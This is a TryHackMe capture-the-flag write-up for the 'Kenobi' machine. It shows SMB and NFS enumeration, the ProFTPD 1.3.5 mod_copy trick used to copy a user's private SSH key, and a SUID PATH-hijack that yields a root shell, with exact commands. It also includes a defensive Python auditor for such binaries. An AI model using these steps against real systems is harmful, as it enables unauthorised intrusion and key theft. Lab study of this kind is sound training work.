
Kenobi Writeup [THM]

Kenobi is a Linux machine from TryHackMe. It consists of enumerating SMB shares, mounting a directory listed via rpcbind, exploiting ProFTPD to gain initial access, and performing a path hijacking attack to obtain root.

Enumeration

Running nmap:

nmap -sC -sV 10.10.197.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 00:30 CEST
Host is up (0.055s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating SMB shares:

smbclient -L \\\\10.10.197.74\\
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      
IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))

We see that an anonymous share is enabled; we can access it without providing any password:

smbclient \\\\10.10.197.74\\anonymous
smb: \> dir
  .                                   D        0  Wed Sep  4 12:49:09 2019
  ..                                  D        0  Wed Sep  4 12:56:07 2019
  log.txt                             N    12237  Wed Sep  4 12:49:09 2019
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (68.3 KiloBytes/sec) (average 68.3 KiloBytes/sec)

Reading the first lines of that file shows that an SSH key has been created for the user kenobi:

head -n 3 log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.

As port 111 was open, we enumerate it with nmap to see whether any NFS mounts are available:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.197.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 00:44 CEST
Nmap scan report for 10.10.197.74
Host is up (0.044s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

We see that we can mount the /var directory, which might prove useful later.

Exploitation

Searching for exploits for ProFTPD 1.3.5, we find the following mod_copy exploit: https://www.exploit-db.com/exploits/36742

This allows us to copy files from one directory to another without being authenticated.

As we had previously found the path to kenobi's SSH key and we know we can mount /var, we can simply copy that SSH key to /var:

nc 10.10.197.74 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.197.74]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful

Now we just need to mount /var on our local machine:

mount 10.10.197.74:/var /mnt/kenobiNFS

Logging in over SSH with the copied key:

chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.197.74

Privilege escalation

We tried to run sudo -l, but we were asked for a password, so we searched for SUID binaries instead:

find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu

That SUID binary caught my eye; inspecting it revealed that it runs some commands without using their full path, so it is vulnerable to a path hijacking attack.

strings /usr/bin/menu
curl -I localhost
uname -r
ifconfig
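As an added defender-side example (not part of the original writeup), the following Python audits setuid-root binaries for exactly this pattern: it extracts printable strings the way strings(1) does and flags any string whose first word is a known command name invoked without an absolute path. SAMPLE_STRINGS and SAMPLE_KNOWN are constructed from the strings output above.

```python
import os
import re
import stat

# Constructed sample: the strings shown for /usr/bin/menu in the writeup above,
# padded with typical non-command strings to exercise the filtering.
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2", "1. status check", "2. kernel version",
    "3. ifconfig", "** Enter your choice :", "curl -I localhost",
    "uname -r", "ifconfig", "/sbin/ifconfig",
]
# Command names a writable PATH entry could shadow (constructed set; a real
# audit would collect the executable names from the directories of a sane PATH).
SAMPLE_KNOWN = {"curl", "uname", "ifconfig", "sh", "bash"}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_relative_commands(strings, known: set) -> list:
    """Strings whose first token is a known command given without a leading '/'."""
    hits = []
    for s in strings:
        tokens = s.strip().split()
        # "/sbin/ifconfig" resolves directly; "ifconfig" goes through the caller's PATH
        if tokens and not tokens[0].startswith("/") and tokens[0] in known:
            hits.append(s.strip())
    return hits


def audit_suid_binaries(root: str, known: set) -> dict:
    """Map each setuid-root regular file under root to its PATH-dependent strings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0):
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable or vanished file: skip it
            hits = find_relative_commands(extract_strings(data), known)
            if hits:
                findings[path] = hits
    return findings
```

Any binary reported here should call its helpers by absolute path (or reset PATH before calling system()), which is the fix for the menu binary's weakness.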

First we create our malicious file inside a directory we can write to, such as /tmp; we will replace ifconfig:

cd /tmp
touch ifconfig
echo "/bin/bash" > ifconfig

Then we prepend /tmp to our PATH:

export PATH=/tmp:$PATH

Finally we give our file execute permissions and run menu, selecting option 3; we are granted a root shell:

kenobi@kenobi:/tmp$ chmod +x ifconfig
kenobi@kenobi:/tmp$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

This post is licensed under CC BY 4.0 by the author.